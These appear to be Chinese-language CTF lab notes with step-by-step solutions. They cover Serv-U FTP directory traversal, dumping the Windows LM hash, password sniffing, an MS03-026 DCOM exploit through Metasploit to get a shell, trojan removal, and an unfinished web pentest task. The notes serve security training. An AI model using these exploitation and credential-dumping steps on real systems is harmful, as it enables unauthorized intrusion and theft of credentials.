CTF

题目1：FTP服务器漏洞

目标系统通过Serv-U搭建了一个FTP服务。请尝试利用软件的漏洞获取目标服务器系统的FLAG.txt文件内的flag值并提交。

1、利用serv-u的漏洞，ftp ip，匿名登录，用户名anonymous，密码无

2、get ..:/windows/system/flag.txt 1.txt

题目2：获取windows本地密码

获取Windows管理员密码的hash值，并把LM hash值作为key值提交；

提示：Windows 本地密码通过LM、以及NTLM俩种加密方式保存；请提交LM 哈希值。

备注：

在线模式：请直接使用渗透机winxp做题即可

独享模式：获取网络靶机IP地址后，请通过远程桌面“mstsc”连接后做题，用户名：administrator密码123456

1\进入c:\tools 点击获取密码 cmd.exe  输入pass.exe $local 500后面那一串

题目3：通过网络嗅探获取Password

某攻击者已经利用漏洞进入某系统的内网，为进一步扩大战果，通过网络嗅探等方式，获取目标系统的密码（password）等敏感信息，请将获取的password值作为key值提交。

1、ping目标主机，然后apr -a查看目标主机的mac地址。

2、打开抓包软件wireshark针对目标主机进行抓包，选择菜单中的Capture——>Options——>Capture Filter——>UDP only——>ok——>Start

3、查找到对应目标地址即可

题目4：通过系统漏洞获取敏感文件内容

你需要利用软件找到目标系统的漏洞，并结合一定的软件利用相应的漏洞获取目标系统的文件及文件中的信息。请利用漏洞获取目标系统key.txt文件，并将其内容作为key值提交

(本题60分)

startx

https://localhost:8834  addexception

confirm secrity exception

scantemp==new scan==设置name和target为目标，run 查看到ms03-026 823980

backtrack ==exploitationtools==networkexploitationtools==metasploit framework==msfconsole

稍等 search ms03_026 

use 上面的路径 exploi。。。。dcom

show options

set rhost ip

set rport 135

exploit

shell

c盘根目录下查看，结束

题目5：服务器木马查杀

 已知目标服务器被攻击，并植入了木马。你作为管理员在发现这个问题之后，当务之急需要登录到服务器当中，在不知道是什么木马的情况下，尽快的查到到木马并清除。

提示：key值隐藏在木马的注册表键值中

备注：

在线模式：获取网络靶机IP地址后，利用渗透攻击机winxp远程桌面“mstsc”连接后做题，用户名：administrator密码123456

独享模式：获取网络靶机IP地址后，请通过远程桌面“mstsc”连接后做题，用户名：administrator密码123456

查看进程，发现kernel32.exe开销不正常，结束， 搜索注册表，发现key Iamvirus

题目6：针对东方科技的渗透测试

东方科技公司是一个拥有很多\\\\\\\\\\\\\\\'黑科技\\\\\\\\\\\\\\\'的公司，而最重要的数据都保存在数据库中，所以请获取其数据库中的敏感信息

点击网络靶机获取IP地址后，用渗透机浏览器访问http://获取到的IP地址/1/